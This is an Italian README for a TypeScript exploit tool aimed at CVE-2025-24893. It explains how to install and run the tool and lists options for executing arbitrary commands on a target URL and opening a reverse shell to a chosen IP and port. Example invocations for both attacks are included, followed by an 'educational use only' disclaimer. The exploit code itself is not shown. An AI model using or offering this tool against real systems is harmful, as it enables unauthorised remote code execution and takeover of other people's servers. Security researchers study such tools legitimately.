
Exploit in TypeScript per CVE-2025-24893 che abilita l'esecuzione remota di comandi e una reverse shell su URL target tramite opzioni configurabili.
Installa bun:
curl -fsSL https://bun.com/install | bash
Per installare le dipendenze:
bun install
Per eseguire:
bun run CVE-2025-24893.ts
Questo progetto è stato creato utilizzando bun init in bun v1.2.19. Bun è un runtime JavaScript veloce e tutto-in-uno.
Usage: bun CVE-2025-24893.ts [options]
Options:
-u, --url <url> The target URL to interact with.
-i, --ip <ip-address> The IP address for a reverse shell connection.
-p, --port <port-number> The port number for the reverse shell.
-r, --rverse Open a reverse shell connection.
-c, --cmd <command> Execute a specific command.
Examples:
# Execute a command on a target URL
bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"
# Open a reverse shell
bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444
Questo exploit e questa guida sono solo a scopo educativo. Usa queste informazioni in modo responsabile e solo su sistemi per cui hai esplicita autorizzazione al test. Lo sfruttamento non autorizzato dei sistemi è illegale e non etico. Gli autori e i contributori non sono responsabili per qualsiasi uso improprio o danno causato da queste informazioni.